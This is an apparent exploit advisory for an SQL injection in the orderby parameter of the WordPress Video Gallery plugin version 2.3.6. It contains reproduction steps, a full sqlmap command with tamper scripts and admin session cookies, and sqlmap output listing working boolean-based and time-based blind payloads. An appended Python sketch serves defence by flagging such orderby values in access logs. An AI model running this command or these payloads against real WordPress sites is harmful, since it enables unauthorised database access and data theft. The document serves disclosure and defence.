- WordPress Video Gallery - YouTube Gallery And Vimeo Gallery 2.3.6 SQL Injection
- Authored by tmrswrr | Site github.com
- WordPress Video Gallery - YouTube Gallery And Vimeo Gallery version 2.3.6 suffers from a remote SQL injection vulnerability.
- SHA-256 | 012d59f6bf2194035050256720e3f27a15d7b84f7333ba8a2b7de8ed79331ec5
# Exploit Title: Wordpress Video Gallery - YouTube Gallery and Vimeo Gallery Plugin SQL Injection
# Date: 2024-07-05
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://total-soft.com/wp-video-gallery/
# Version 2.3.6
1. **Access the Admin Panel:**
   - Navigate to the admin panel of your WordPress site.
   - Go to `TS Video Gallery` > `Create` > `Use Theme` and save it.
2. After saving, go back to TS Video Gallery and click the title: https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=asc
3. Search for the orderby parameter.
## SQLMAP COMMAND
```
python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=desc" --batch --dbms=mysql --thread 10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 -p orderby --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|0b78b25e2683d7f381967019db82b3f3fd9b06f1524ec128af92a74fe7c68e8f; \
wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|307f68044e4c2632757b13f86f770ceda3c9c7866a0b595b33a7a2f675224a15; \
wordpress_test_cookie=WP Cookie check; \
wp-settings-time-1=1720173805" --thread 10
```
## RESULT
```
sqlmap identified the following injection point(s) with a total of 1026 HTTP(s) requests:
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[08:37:45] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:37:45] [INFO] the back-end DBMS is MySQL
[08:37:45] [PAYLOAD] (seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON/**/seLecT/**/9990)/**/End))
web application technology: Apache 2.4.54, PHP 8.0.23
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
```
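A detection sketch for the request pattern above, added here as an example and not part of the original advisory: it scans web-server access logs for requests to the `tsvg-admin` page whose `orderby` value is anything other than a bare column identifier such as `TS_VG_Title`. The combined log format, the sample lines and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, assumed). Lines 2
# and 3 carry the two payload shapes listed in the sqlmap result, URL-encoded.
_BASE = ('127.0.0.1 - - [05/Jul/2024:08:37:%02d +0000] '
         '"GET /wordpress/wp-admin/admin.php?%s HTTP/1.1" 200 5120')
SAMPLE_LOG = [
    _BASE % (1, "page=tsvg-admin&orderby=TS_VG_Title&order=asc"),
    _BASE % (2, "page=tsvg-admin&orderby=TS_VG_Title%20AND%20(SELECT%206127"
                "%20FROM%20(SELECT(SLEEP(5)))mIWx)&order=desc"),
    _BASE % (3, "page=tsvg-admin&orderby=(SELECT%20(CASE%20WHEN%20(1078%3D1078)"
                "%20THEN%200x54535f56475f5469746c65%20ELSE%20(SELECT%202977"
                "%20UNION%20SELECT%208545)%20END))&order=desc"),
    _BASE % (4, "page=some-other-page&orderby=date&order=desc"),
]

# Request line inside the quoted field of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate sort key is a single bare column identifier.
IDENT_RE = re.compile(r'[A-Za-z_][A-Za-z0-9_]*')


def suspicious_sort_requests(lines, page="tsvg-admin"):
    """Return (line_number, decoded_orderby) for non-identifier sort keys.

    Hypothetical helper: only requests whose `page` parameter matches are
    inspected, so unrelated admin pages do not add noise.
    """
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        params = parse_qs(urlsplit(match.group(1)).query,
                          keep_blank_values=True)
        if page not in params.get("page", []):
            continue
        for value in params.get("orderby", []):
            # parse_qs has already percent-decoded the value.
            if not IDENT_RE.fullmatch(value):
                hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in suspicious_sort_requests(SAMPLE_LOG):
        print(f"line {number}: unexpected orderby value: {value!r}")
```

Matching on the shape of a valid value rather than on SQL keywords means the tampered variants in the sqlmap log (random case, `/**/` in place of spaces) are flagged as well.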